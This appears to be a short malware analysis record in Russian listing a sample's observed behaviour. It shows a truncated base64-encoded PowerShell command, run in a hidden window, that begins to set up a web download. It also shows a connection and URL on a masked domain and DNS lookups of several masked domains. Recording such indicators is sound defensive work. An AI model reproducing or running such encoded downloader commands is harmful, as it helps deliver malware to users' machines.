Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AF8AMABfADQANwA9ACgAJwBtAF8AXwBfADMANwAnACsAJwBfACcAKQA7ACQAdQA0ADEAMQA2ADQAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAbwAyADYAOQA3ADAAOQA9ACgAJwBoAHQAdABwAC...
- 'uz###portal.com':80
- http://www.uz###portal.com/6YgWpoHfD4
- DNS ASK uz###portal.com
- DNS ASK we####itechs.com
- DNS ASK ma###rnj.com
- DNS ASK iz##u.com
- DNS ASK di##.online
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AF8AMABfADQANwA9ACgAJwBtAF8AXwBfADMANwAnACsAJwBfACcAKQA7ACQAdQA0ADEAMQA2ADQAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAbwAyADYAOQA3ADAAOQA9ACgAJwBoAHQAdABwAC...' (со скрытым окном)